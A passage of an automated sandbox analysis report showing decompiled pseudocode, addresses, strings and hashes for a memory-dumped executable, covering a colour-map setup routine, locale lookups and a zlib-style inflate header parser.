							_t392 = _t392 + 0x1c;
						}
						 *((char*)(_t389 - 0x6c)) = 0;
						 *((short*)(_t389 - 0x66)) =  *(_t389 - 0x60);
						 *((short*)(_t389 - 0x68)) =  *((intOrPtr*)(_t389 - 0x66));
						 *((short*)(_t389 - 0x6a)) =  *((intOrPtr*)(_t389 - 0x68));
						 *((short*)(_t389 - 0x64)) =  *((intOrPtr*)(_t389 - 0x6a));
						L0041BD70( *((intOrPtr*)(_t389 - 0x20)), _t389 - 0x6c, 1, 0, 0);
						_t393 = _t392 + 0x14;
						 *(_t389 - 8) = 0;
					} else {
						if( *( *((intOrPtr*)(_t389 - 0x34)) + 0x18) < 0x100) {
							E0041B170( *((intOrPtr*)(_t389 - 0x20)), "ga-alpha color-map: too few entries");
						}
						 *(_t389 - 0x74) = 0;
						while( *(_t389 - 0x74) < 0xe7) {
							 *(_t389 - 0x78) = (( *(_t389 - 0x74) << 8) + 0x73) / 0xe7;
							 *(_t389 - 0xe4) =  *(_t389 - 0x74);
							E0040C360(_t407,  *((intOrPtr*)(_t389 - 0x14)),  *(_t389 - 0xe4),  *(_t389 - 0x78),  *(_t389 - 0x78),  *(_t389 - 0x78), 0xff, 1);
							_t391 = _t391 + 0x1c;
							 *(_t389 - 0x74) =  *(_t389 - 0x74) + 1;
						}
						 *(_t389 - 0x10) =  *(_t389 - 0x74);
						 *(_t389 - 0xe8) =  *(_t389 - 0x74);
						asm("sbb eax, eax");
						E0040C360(_t407,  *((intOrPtr*)(_t389 - 0x14)),  *(_t389 - 0xe8),  *(_t389 - 0x1c),  *(_t389 - 0x28),  *(_t389 - 0x18), ( ~( *((intOrPtr*)(_t389 - 0x24)) - 2) & 0xffff0100) + 0xffff,  *((intOrPtr*)(_t389 - 0x24)));
						_t393 = _t391 + 0x1c;
						 *(_t389 - 0x74) =  *(_t389 - 0x74) + 1;
						if( *((intOrPtr*)(_t389 - 0x24)) == 1) {
							 *(_t389 - 0x1c) =  *(0x44f150 +  *(_t389 - 0x1c) * 2) & 0x0000ffff;
							 *(_t389 - 0x28) =  *(0x44f150 +  *(_t389 - 0x28) * 2) & 0x0000ffff;
							 *(_t389 - 0x18) =  *(0x44f150 +  *(_t389 - 0x18) * 2) & 0x0000ffff;
						}
						 *(_t389 - 0x70) = 1;
						while( *(_t389 - 0x70) < 5) {
							 *(_t389 - 0x7c) =  *(_t389 - 0x70) * 0x33;
							 *(_t389 - 0x84) = (0xff -  *(_t389 - 0x7c)) *  *(_t389 - 0x1c);
							 *(_t389 - 0x8c) = (0xff -  *(_t389 - 0x7c)) *  *(_t389 - 0x28);
							 *(_t389 - 0x88) = (0xff -  *(_t389 - 0x7c)) *  *(_t389 - 0x18);
							 *(_t389 - 0x80) = 0;
							while( *(_t389 - 0x80) < 6) {
								 *(_t389 - 0x90) = ( *(0x44f150 +  *(_t389 - 0x80) * 0x33 * 2) & 0x0000ffff) *  *(_t389 - 0x7c);
								 *(_t389 - 0xec) =  *(_t389 - 0x74);
								E0040C360(_t407,  *((intOrPtr*)(_t389 - 0x14)),  *(_t389 - 0xec), ( *(0x44f350 + ( *(_t389 - 0x90) +  *(_t389 - 0x84) >> 0xf) * 2) & 0x0000ffff) + (( *(_t389 - 0x90) +  *(_t389 - 0x84) & 0x00007fff) * ( *(( *(_t389 - 0x90) +  *(_t389 - 0x84) >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff, ( *(0x44f350 + ( *(_t389 - 0x90) +  *(_t389 - 0x8c) >> 0xf) * 2) & 0x0000ffff) + (( *(_t389 - 0x90) +  *(_t389 - 0x8c) & 0x00007fff) * ( *(( *(_t389 - 0x90) +  *(_t389 - 0x8c) >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff, ( *(0x44f350 + ( *(_t389 - 0x90) +  *(_t389 - 0x88) >> 0xf) * 2) & 0x0000ffff) + (( *(_t389 - 0x90) +  *(_t389 - 0x88) & 0x00007fff) * ( *(( *(_t389 - 0x90) +  *(_t389 - 0x88) >> 0xf) + 0x44f750) & 0x000000ff) >> 0x0000000c) >> 0x00000008 & 0xff, 0xff, 1);
								_t393 = _t393 + 0x1c;
								 *(_t389 - 0x74) =  *(_t389 - 0x74) + 1;
								 *(_t389 - 0x80) =  *(_t389 - 0x80) + 1;
							}
							 *(_t389 - 0x70) =  *(_t389 - 0x70) + 1;
						}
						 *(_t389 - 0xc) =  *(_t389 - 0x74);
						 *(_t389 - 8) = 1;
					}
				} else {
					if( *( *((intOrPtr*)(_t389 - 0x34)) + 0x18) < 0x100) {
						E0041B170( *((intOrPtr*)(_t389 - 0x20)), "gray+alpha color-map: too few entries");
					}
					_t272 = L0040CB20( *((intOrPtr*)(_t389 - 0x14)));
					_t393 = _t391 + 4;
					 *(_t389 - 0xc) = _t272;
					 *(_t389 - 0x10) = 0xe7;
					 *(_t389 - 8) = 1;
				}
				if( *((intOrPtr*)(_t389 - 4)) != 0 && ( *( *((intOrPtr*)(_t389 - 0x20)) + 0x148) & 0x0000ffff) > 0 && ( *( *((intOrPtr*)(_t389 - 0x20)) + 0x14f) & 4) == 0) {
					E0041C1A0( *((intOrPtr*)(_t389 - 0x20)));
					_t393 = _t393 + 4;
				}
				 *(_t389 - 0x108) =  *(_t389 - 0x30);
				if( *(_t389 - 0x108) == 1) {
					L0041BF20(_t407,  *((intOrPtr*)(_t389 - 0x20)), 0, 0x35b60);
					_t393 = _t393 + 0xc;
					goto L37;
				} else {
					if( *(_t389 - 0x108) == 3) {
						L37:
						if(( *( *((intOrPtr*)(_t389 - 0x20)) + 0x150) & 0x000000ff) > 8) {
							L0041BEC0( *((intOrPtr*)(_t389 - 0x20)));
						}
					} else {
					}
				}
				if( *(_t389 - 0xc) > 0x100 ||  *(_t389 - 0xc) >  *( *((intOrPtr*)(_t389 - 0x34)) + 0x18)) {
					E0041B170( *((intOrPtr*)(_t389 - 0x20)), "color map overflow (BAD internal error)");
				}
				 *( *((intOrPtr*)(_t389 - 0x34)) + 0x18) =  *(_t389 - 0xc);
				 *(_t389 - 0x10c) =  *(_t389 - 8);
				if( *(_t389 - 0x10c) > 4) {
					E0041B170( *((intOrPtr*)(_t389 - 0x20)), "bad processing option (internal error)");
					goto L61;
				} else {
					switch( *((intOrPtr*)( *(_t389 - 0x10c) * 4 +  &M0040C144))) {
						case 0:
							if( *(_t389 - 0x10) != 0x100) {
								goto L61;
							}
							goto L62;
						case 1:
							if( *((intOrPtr*)(__ebp - 0x10)) != 0xe7) {
								goto L61;
							}
							goto L62;
						case 2:
							__ecx =  *((intOrPtr*)(__ebp - 0x10));
							if( *((intOrPtr*)(__ebp - 0x10)) >=  *((intOrPtr*)(__ebp - 0xc)) ||  *((intOrPtr*)(__ebp - 0x10)) != 0xfe) {
								goto L61;
							} else {
							}
							goto L62;
						case 3:
							if( *((intOrPtr*)(__ebp - 0x10)) != 0x100) {
								goto L61;
							}
							goto L62;
						case 4:
							if( *((intOrPtr*)(__ebp - 0x10)) == 0xd8) {
							} else {
								L61:
								E0041B170( *((intOrPtr*)(_t389 - 0x20)), "bad background index (internal error)");
							}
							goto L62;
					}
				}
				L62:
				 *( *((intOrPtr*)(_t389 - 0x14)) + 0x28) =  *(_t389 - 8);
				return 1;
			}

0x0040b0c4
0x0040b0c4
0x0040b0d1
0x0040b115
0x0040b132
0x0040b13f
0x0040b14a
0x0040b14a
0x0040b153
0x0040b158
0x0040b15b
0x0040b162
0x0040b1ad
0x0040b1cb
0x0040b1d0
0x0040b1d0
0x0040b1d3
0x0040b1db
0x0040b1e3
0x0040b1eb
0x0040b1f3
0x0040b205
0x0040b20a
0x0040b20d
0x0040b219
0x0040b223
0x0040b22e
0x0040b22e
0x0040b233
0x0040b23a
0x0040b255
0x0040b25b
0x0040b27f
0x0040b284
0x0040b28d
0x0040b28d
0x0040b295
0x0040b29b
0x0040b2ad
0x0040b2d1
0x0040b2d6
0x0040b2df
0x0040b2e6
0x0040b2f3
0x0040b301
0x0040b30f
0x0040b30f
0x0040b312
0x0040b324
0x0040b334
0x0040b343
0x0040b355
0x0040b367
0x0040b36d
0x0040b37f
0x0040b39b
0x0040b3a4
0x0040b4b5
0x0040b4ba
0x0040b4c3
0x0040b37c
0x0040b37c
0x0040b321
0x0040b321
0x0040b4d3
0x0040b4d6
0x0040b4d6
0x0040b0d3
0x0040b0dd
0x0040b0e8
0x0040b0e8
0x0040b0f1
0x0040b0f6
0x0040b0f9
0x0040b0fc
0x0040b103
0x0040b103
0x0040bfec
0x0040c00f
0x0040c014
0x0040c014
0x0040c01a
0x0040c027
0x0040c03f
0x0040c044
0x00000000
0x0040c029
0x0040c030
0x0040c047
0x0040c054
0x0040c05a
0x0040c05f
0x00000000
0x0040c032
0x0040c030
0x0040c069
0x0040c07f
0x0040c07f
0x0040c08a
0x0040c090
0x0040c09d
0x0040c0fe
0x00000000
0x0040c09f
0x0040c0a5
0x00000000
0x0040c0b3
0x00000000
0x0040c0b5
0x00000000
0x00000000
0x0040c0c0
0x00000000
0x0040c0c2
0x00000000
0x00000000
0x0040c0c6
0x0040c0cc
0x00000000
0x00000000
0x0040c0d9
0x00000000
0x00000000
0x0040c0e2
0x00000000
0x0040c0e4
0x00000000
0x00000000
0x0040c0ef
0x0040c0f1
0x0040c103
0x0040c10c
0x0040c10c
0x00000000
0x00000000
0x0040c0a5
0x0040c111
0x0040c117
0x0040c124

Strings

gray-alpha color-map: too few entries, xrefs: 0040B141
color map overflow (BAD internal error), xrefs: 0040C076
ga-alpha color-map: too few entries, xrefs: 0040B225
bad background index (internal error), xrefs: 0040C103
gray+alpha color-map: too few entries, xrefs: 0040B0DF

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: bad background index (internal error)$color map overflow (BAD internal error)$ga-alpha color-map: too few entries$gray+alpha color-map: too few entries$gray-alpha color-map: too few entries
API String ID: 0-3280840408
Opcode ID: 1c42728e1d7104191376fac7fe5ec34ddc5196e808750edc17936bcd3057837f
Instruction ID: 4de49e0153e975ea9cab2a03d6e816c219f435627a00e903c2e62aade2372feb
Opcode Fuzzy Hash: 1c42728e1d7104191376fac7fe5ec34ddc5196e808750edc17936bcd3057837f
Instruction Fuzzy Hash: 16E12B71D04119CBDB18CF99C891BADB7B2FF98304F24826AE509BB391C7789981CF58

Uniqueness

Uniqueness Score: -1,00%

Function 00446A72, Relevance: 6.2, APIs: 4, Instructions: 173COMMON

Download Yara Rule

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 00446ACB
GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 00446B18
GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 00446BC8

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: InfoLocale$__getptd_noexit
String ID:
API String ID: 1862418609-0
Opcode ID: e656aae7dc97fc079e2760b337e55eb42981d1c84e5ea92478d19e89ad1552a0
Instruction ID: 182d6003341d523dc6036e622bf3423daa62b48d1ddfb025c0d5d2459799261b
Opcode Fuzzy Hash: e656aae7dc97fc079e2760b337e55eb42981d1c84e5ea92478d19e89ad1552a0
Instruction Fuzzy Hash: 8751B1716002179FFB289F25CC82B7777A8EF02314F11406BE905DA295E77CE994CB6A

Uniqueness

Uniqueness Score: -1,00%

Function 0042B4FE, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 589
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E0042B4FE(signed int _a4, intOrPtr _a8) {
				signed char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v21;
				signed char _v22;
				signed char _v23;
				signed char _v24;
				signed char* _v28;
				signed int _v32;
				signed int _v34;
				signed int _v35;
				signed int _v36;
				signed int _v40;
				short _v42;
				signed int _v44;
				signed int _v48;
				intOrPtr* _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				unsigned int _t794;
				signed int _t802;
				signed int _t829;
				signed int* _t834;
				void* _t835;
				void* _t836;

				_t760 = _a4;
				_t836 = _t835 - 0x2c;
				if(_t760 == 0) {
					L318:
					_push(0xfffffffe);
					L319:
					_pop(_t761);
					L320:
					return _t761;
				}
				_t834 =  *(_t760 + 0x1c);
				if(_t834 != 0 &&  *((intOrPtr*)(_t760 + 0xc)) != 0 && ( *_t760 != 0 ||  *((intOrPtr*)(_t760 + 4)) == 0)) {
					if( *_t834 == 0xb) {
						 *_t834 = 0xc;
					}
					_t794 = _t834[0xe];
					_v28 =  *((intOrPtr*)(_t760 + 0xc));
					_t802 =  *((intOrPtr*)(_t760 + 0x10));
					_t762 =  *((intOrPtr*)(_t760 + 4));
					_v8 =  *_t760;
					_t829 = _t834[0xf];
					_v20 = _t802;
					_v12 = _t762;
					_v48 = _t762;
					_v32 = _t802;
					_v40 = 0;
					while(1) {
						L317:
						_t763 =  *_t834;
						if(_t763 > 0x1e) {
							goto L318;
						}
						switch( *((intOrPtr*)(_t763 * 4 +  &M0042C72A))) {
							case 0:
								_t764 = _t834[2];
								__eflags = _t764;
								if(_t764 != 0) {
									while(1) {
										__eflags = _t829 - 0x10;
										if(_t829 >= 0x10) {
											break;
										}
										__eflags = _v12;
										if(_v12 == 0) {
											goto L326;
										} else {
											_v12 = _v12 - 1;
											_t810 = _t829;
											_t794 = _t794 + (( *_v8 & 0x000000ff) << _t829);
											_v8 =  &(_v8[1]);
											_t829 = _t829 + 8;
											__eflags = _t829;
											continue;
										}
									}
									__eflags = _t764 & 0x00000002;
									if((_t764 & 0x00000002) == 0) {
										L17:
										_t774 = _t834[8];
										_t834[4] = _t834[4] & 0x00000000;
										__eflags = _t774;
										if(_t774 != 0) {
											_t37 = _t774 + 0x30;
											 *_t37 =  *(_t774 + 0x30) | 0xffffffff;
											__eflags =  *_t37;
										}
										__eflags = _t834[2] & 0x00000001;
										if((_t834[2] & 0x00000001) == 0) {
											L28:
											 *(_a4 + 0x18) = "incorrect header check";
											goto L316;
										}
										_t778 = ((_t794 & 0x000000ff) << 8) + (_t794 >> 8);
										_push(0x1f);
										_pop(_t810);
										__eflags = _t778 % _t810;
										if(_t778 % _t810 != 0) {
											goto L28;
										}
										__eflags = (_t794 & 0x0000000f) - 8;
										if((_t794 & 0x0000000f) == 8) {
											_t782 = _t834[9];
											_t794 = _t794 >> 4;
											_t829 = _t829 - 4;
											_t810 = (_t794 & 0x0000000f) + 8;
											__eflags = _t782;
											if(_t782 != 0) {
												__eflags = _t810 - _t782;
												if(_t810 <= _t782) {
													goto L25;
												} else {
													 *(_a4 + 0x18) = "invalid window size";
													goto L316;
												}
											} else {
												_t834[9] = _t810;
												L25:
												_t829 = 0;
												_t834[5] = 1 << _t810;
												_t786 = E0042CA6C(0, 0, 0);
												_t810 = _a4;
												_t834[6] = _t786;
												 *(_a4 + 0x30) = _t786;
												_t836 = _t836 + 0xc;
												 *_t834 =  !(_t794 >> 8) & 0x00000002 | 0x00000009;
												_t794 = 0;
												goto L317;
											}
										}
										goto L22;
									}
									__eflags = _t794 - 0x8b1f;
									if(_t794 != 0x8b1f) {
										goto L17;
									} else {
										_t829 = 0;
										_t834[6] = E0042CA52(_t810, 0, 0, 0);
										_v24 = 0x1f;
										_v23 = 0x8b;
										_t791 = E0042CA52(_t810, _t834[6],  &_v24, 2);
										_t836 = _t836 + 0x18;
										_t834[6] = _t791;
										_t794 = 0;
										 *_t834 = 1;
										goto L317;
									}
								} else {
									 *_t834 = 0xc;
									goto L317;
								}
							case 1:
								while(1) {
									__eflags = __edi - 0x10;
									if(__edi >= 0x10) {
										break;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									} else {
										_v8 =  *_v8 & 0x000000ff;
										_v12 = _v12 - 1;
										__ecx = __edi;
										__eax = ( *_v8 & 0x000000ff) << __cl;
										__ebx = __ebx + __eax;
										_v8 =  &(_v8[1]);
										__edi = __edi + 8;
										__eflags = __edi;
										continue;
									}
								}
								__esi[4] = __ebx;
								__eflags = __bl - 8;
								if(__bl != 8) {
									L22:
									 *(_a4 + 0x18) = "unknown compression method";
									goto L316;
								}
								__eflags = __ebx & 0x0000e000;
								if((__ebx & 0x0000e000) == 0) {
									__eax = __esi[8];
									__eflags = __eax;
									if(__eax != 0) {
										__ebx = __ebx >> 8;
										__ecx = __ebx >> 0x00000008 & 0x00000001;
										__eflags = __ecx;
										 *__eax = __ecx;
									}
									__eflags = __esi[4] & 0x00000200;
									if((__esi[4] & 0x00000200) != 0) {
										_v24 = __bl;
										__eax =  &_v24;
										__eflags = __ebx;
										_v23 = __bl;
										__eax = E0042CA52(__ecx, __esi[6],  &_v24, 2);
										__esi[6] = __eax;
									}
									__ebx = 0;
									__edi = 0;
									 *__esi = 2;
									goto L42;
								} else {
									__eax = _a4;
									 *(__eax + 0x18) = "unknown header flags set";
									goto L316;
								}
							case 2:
								while(1) {
									L42:
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										break;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									_v8 =  *_v8 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__eax = ( *_v8 & 0x000000ff) << __cl;
									__ebx = __ebx + __eax;
									_v8 =  &(_v8[1]);
									__edi = __edi + 8;
									__eflags = __edi;
								}
								__eax = __esi[8];
								__eflags = __eax;
								if(__eax != 0) {
									 *(__eax + 4) = __ebx;
								}
								__eflags = __esi[4] & 0x00000200;
								if((__esi[4] & 0x00000200) != 0) {
									__ebx = __ebx >> 8;
									_v23 = __al;
									__ebx = __ebx >> 0x10;
									_v22 = __al;
									_v24 = __bl;
									__eax =  &_v24;
									__eflags = __ebx;
									_v21 = __bl;
									__eax = E0042CA52(__ecx, __esi[6],  &_v24, 4);
									__esi[6] = __eax;
								}
								__ebx = 0;
								__edi = 0;
								 *__esi = 3;
								goto L50;
							case 3:
								while(1) {
									L50:
									__eflags = __edi - 0x10;
									if(__edi >= 0x10) {
										break;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									_v8 =  *_v8 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__eax = ( *_v8 & 0x000000ff) << __cl;
									__ebx = __ebx + __eax;
									_v8 =  &(_v8[1]);
									__edi = __edi + 8;
									__eflags = __edi;
								}
								__eax = __esi[8];
								__eflags = __eax;
								if(__eax != 0) {
									__ebx = __ebx & 0x000000ff;
									 *(__eax + 8) = __ebx & 0x000000ff;
									__ecx = __esi[8];
									__eax = __ebx;
									__eax = __ebx >> 8;
									__eflags = __eax;
									 *(__ecx + 0xc) = __eax;
								}
								__eflags = __esi[4] & 0x00000200;
								if((__esi[4] & 0x00000200) != 0) {
									_v24 = __bl;
									__eax =  &_v24;
									__eflags = __ebx;
									_v23 = __bl;
									__eax = E0042CA52(__ecx, __esi[6],  &_v24, 2);
									__esi[6] = __eax;
								}
								__ebx = 0;
								__edi = 0;
								__eflags = 0;
								 *__esi = 4;
								goto L56;
							case 4:
								L56:
								__eflags = __esi[4] & 0x00000400;
								if((__esi[4] & 0x00000400) != 0) {
									while(1) {
										__eflags = __edi - 0x10;
										if(__edi >= 0x10) {
											break;
										}
										__eflags = _v12;
										if(_v12 == 0) {
											goto L326;
										}
										_v8 =  *_v8 & 0x000000ff;
										_v12 = _v12 - 1;
										__ecx = __edi;
										__eax = ( *_v8 & 0x000000ff) << __cl;
										__ebx = __ebx + __eax;
										_v8 =  &(_v8[1]);
										__edi = __edi + 8;
										__eflags = __edi;
									}
									__eax = __esi[8];
									__esi[0x10] = __ebx;
									__eflags = __eax;
									if(__eax != 0) {
										 *(__eax + 0x14) = __ebx;
									}
									__eflags = __esi[4] & 0x00000200;
									if((__esi[4] & 0x00000200) != 0) {
										_v24 = __bl;
										__eax =  &_v24;
										__eflags = __ebx;
										_v23 = __bl;
										__eax = E0042CA52(__ecx, __esi[6],  &_v24, 2);
										__esi[6] = __eax;
									}
									__ebx = 0;
									__edi = 0;
									L59:
									 *__esi = 5;
									goto L60;
								}
								__eax = __esi[8];
								__eflags = __eax;
								if(__eax != 0) {
									_t118 = __eax + 0x10;
									 *_t118 =  *(__eax + 0x10) & 0x00000000;
									__eflags =  *_t118;
								}
								goto L59;
							case 5:
								L60:
								__eflags = __esi[4] & 0x00000400;
								if((__esi[4] & 0x00000400) == 0) {
									L82:
									_t169 =  &(__esi[0x10]);
									 *_t169 = __esi[0x10] & 0x00000000;
									__eflags =  *_t169;
									 *__esi = 6;
									goto L83;
								}
								__edx = __esi[0x10];
								__eax = _v12;
								_v16 = __edx;
								__eflags = __edx - __eax;
								if(__edx > __eax) {
									_v16 = __eax;
								}
								__eflags = _v16;
								if(_v16 != 0) {
									__ecx = __esi[8];
									__eflags = __ecx;
									if(__ecx != 0) {
										__eax =  *(__ecx + 0x10);
										_v44 = __eax;
										__eflags = __eax;
										if(__eax != 0) {
											__eax =  *(__ecx + 0x14);
											__ecx =  *(__ecx + 0x18);
											__eax = __eax - __edx;
											_v16 = _v16 + __eax;
											__eflags = _v16 + __eax - __ecx;
											if(_v16 + __eax <= __ecx) {
												__ecx = _v16;
											} else {
												__ecx = __ecx - __eax;
											}
											_v44 = _v44 + __eax;
											__eflags = _v44 + __eax;
											__eax = L00433F90(_v44 + __eax, _v8, __ecx);
										}
									}
									__eflags = __esi[4] & 0x00000200;
									if((__esi[4] & 0x00000200) != 0) {
										__esi[6] = E0042CA52(__ecx, __esi[6], _v8, _v16);
									}
									__eax = _v16;
									_v12 = _v12 - __eax;
									_v8 =  &(_v8[__eax]);
									_t166 =  &(__esi[0x10]);
									 *_t166 = __esi[0x10] - __eax;
									__eflags =  *_t166;
								}
								__eflags = __esi[0x10];
								if(__esi[0x10] != 0) {
									goto L326;
								} else {
									goto L82;
								}
							case 6:
								L83:
								__eflags = __esi[4] & 0x00000800;
								if((__esi[4] & 0x00000800) == 0) {
									__eax = __esi[8];
									__eflags = __eax;
									if(__eax != 0) {
										_t204 = __eax + 0x1c;
										 *_t204 =  *(__eax + 0x1c) & 0x00000000;
										__eflags =  *_t204;
									}
									L98:
									_t206 =  &(__esi[0x10]);
									 *_t206 = __esi[0x10] & 0x00000000;
									__eflags =  *_t206;
									 *__esi = 7;
									goto L99;
								}
								__eflags = _v12;
								if(_v12 == 0) {
									goto L326;
								}
								__eax = 0;
								__eflags = 0;
								while(1) {
									__ecx = _v8;
									__edx =  *(__eax + __ecx) & 0x000000ff;
									_v16 = __eax;
									__eax = __esi[8];
									_v36 = __edx;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx =  *(__eax + 0x1c);
										_v44 = __ecx;
										__eflags = __ecx;
										if(__ecx != 0) {
											__ecx = __esi[0x10];
											__eflags = __ecx -  *((intOrPtr*)(__eax + 0x20));
											if(__ecx <  *((intOrPtr*)(__eax + 0x20))) {
												__eax = _v44;
												 *((char*)(_v44 + __ecx)) = __dl;
												_t186 =  &(__esi[0x10]);
												 *_t186 = __esi[0x10] + 1;
												__eflags =  *_t186;
											}
										}
									}
									__eflags = __edx;
									if(__edx == 0) {
										break;
									}
									__eax = _v16;
									__eflags = __eax - _v12;
									if(__eax < _v12) {
										continue;
									}
									break;
								}
								__eflags = __esi[4] & 0x00000200;
								if((__esi[4] & 0x00000200) != 0) {
									__eax = E0042CA52(__ecx, __esi[6], _v8, _v16);
									__edx = _v36;
									__esi[6] = __eax;
								}
								__eax = _v16;
								_v12 = _v12 - __eax;
								_v8 =  &(_v8[__eax]);
								__eflags = __edx;
								if(__edx != 0) {
									goto L326;
								} else {
									goto L98;
								}
							case 7:
								L99:
								__eflags = __esi[4] & 0x00001000;
								if((__esi[4] & 0x00001000) == 0) {
									__eax = __esi[8];
									__eflags = __eax;
									if(__eax != 0) {
										_t241 = __eax + 0x24;
										 *_t241 =  *(__eax + 0x24) & 0x00000000;
										__eflags =  *_t241;
									}
									L114:
									 *__esi = 8;
									goto L115;
								}
								__eflags = _v12;
								if(_v12 == 0) {
									goto L326;
								}
								__eax = 0;
								__eflags = 0;
								while(1) {
									__ecx = _v8;
									__edx =  *(__eax + __ecx) & 0x000000ff;
									_v16 = __eax;
									__eax = __esi[8];
									_v36 = __edx;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx =  *(__eax + 0x24);
										_v44 = __ecx;
										__eflags = __ecx;
										if(__ecx != 0) {
											__ecx = __esi[0x10];
											__eflags = __ecx -  *((intOrPtr*)(__eax + 0x28));
											if(__ecx <  *((intOrPtr*)(__eax + 0x28))) {
												__eax = _v44;
												 *((char*)(_v44 + __ecx)) = __dl;
												_t223 =  &(__esi[0x10]);
												 *_t223 = __esi[0x10] + 1;
												__eflags =  *_t223;
											}
										}
									}
									__eflags = __edx;
									if(__edx == 0) {
										break;
									}
									__eax = _v16;
									__eflags = __eax - _v12;
									if(__eax < _v12) {
										continue;
									}
									break;
								}
								__eflags = __esi[4] & 0x00000200;
								if((__esi[4] & 0x00000200) != 0) {
									__eax = E0042CA52(__ecx, __esi[6], _v8, _v16);
									__edx = _v36;
									__esi[6] = __eax;
								}
								__eax = _v16;
								_v12 = _v12 - __eax;
								_v8 =  &(_v8[__eax]);
								__eflags = __edx;
								if(__edx != 0) {
									goto L326;
								} else {
									goto L114;
								}
							case 8:
								L115:
								__eflags = __esi[4] & 0x00000200;
								if((__esi[4] & 0x00000200) == 0) {
									L123:
									__eax = __esi[8];
									__eflags = __eax;
									if(__eax != 0) {
										__edx = __esi[4];
										__ecx = 0;
										__ecx = 1;
										__edx = __esi[4] >> 9;
										__edx = __esi[4] >> 0x00000009 & 1;
										__eflags = __edx;
										 *(__eax + 0x2c) = __edx;
										__eax = __esi[8];
										 *((intOrPtr*)(__esi[8] + 0x30)) = 1;
									}
									__eax = 0;
									__eax = E0042CA52(__ecx, 0, 0, 0);
									__ecx = _a4;
									__esi[6] = __eax;
									 *(__ecx + 0x30) = __eax;
									goto L241;
								}
								while(1) {
									__eflags = __edi - 0x10;
									if(__edi >= 0x10) {
										break;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									_v8 =  *_v8 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__eax = ( *_v8 & 0x000000ff) << __cl;
									__ebx = __ebx + __eax;
									_v8 =  &(_v8[1]);
									__edi = __edi + 8;
									__eflags = __edi;
								}
								__eax = __esi[6] & 0x0000ffff;
								__eflags = __ebx - (__esi[6] & 0x0000ffff);
								if(__ebx == (__esi[6] & 0x0000ffff)) {
									__ebx = 0;
									__edi = 0;
									__eflags = 0;
									goto L123;
								}
								__eax = _a4;
								 *(__eax + 0x18) = "header crc mismatch";
								goto L316;
							case 9:
								while(1) {
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										break;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									_v8 =  *_v8 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__eax = ( *_v8 & 0x000000ff) << __cl;
									__ebx = __ebx + __eax;
									_v8 =  &(_v8[1]);
									__edi = __edi + 8;
									__eflags = __edi;
								}
								__ecx = __ebx;
								__eax = 0xff00;
								__ecx = __ebx & 0x0000ff00;
								__ebx = __ebx << 0x10;
								__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10);
								__ebx = __ebx >> 8;
								__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10) << 8;
								__edx = __ebx >> 0x00000008 & 0x0000ff00;
								__ecx = ((__ebx & 0x0000ff00) + (__ebx << 0x10) << 8) + (__ebx >> 0x00000008 & 0x0000ff00);
								__eax = __ecx + __ebx;
								__ecx = _a4;
								__esi[6] = __eax;
								 *(__ecx + 0x30) = __eax;
								__ebx = 0;
								__edi = 0;
								 *__esi = 0xa;
								goto L131;
							case 0xa:
								__ecx = _a4;
								L131:
								__eflags = __esi[3];
								if(__esi[3] == 0) {
									__eax = _v28;
									 *(__ecx + 0xc) = _v28;
									__eax = _v20;
									 *(__ecx + 0x10) = _v20;
									__eax = _v8;
									 *__ecx = _v8;
									__eax = _v12;
									 *((intOrPtr*)(__ecx + 4)) = _v12;
									__esi[0xe] = __ebx;
									__esi[0xf] = __edi;
									_push(2);
									goto L319;
								}
								__eax = 0;
								__eflags = 0;
								__eax = E0042CA6C(0, 0, 0);
								__ecx = _a4;
								__esi[6] = __eax;
								 *(__ecx + 0x30) = __eax;
								 *__esi = 0xb;
								goto L133;
							case 0xb:
								L133:
								__eflags = _a8 - 5;
								if(_a8 == 5) {
									goto L326;
								}
								__eflags = _a8 - 6;
								if(_a8 == 6) {
									goto L326;
								}
								goto L135;
							case 0xc:
								L135:
								__eflags = __esi[1];
								if(__esi[1] == 0) {
									while(1) {
										__eflags = __edi - 3;
										if(__edi >= 3) {
											break;
										}
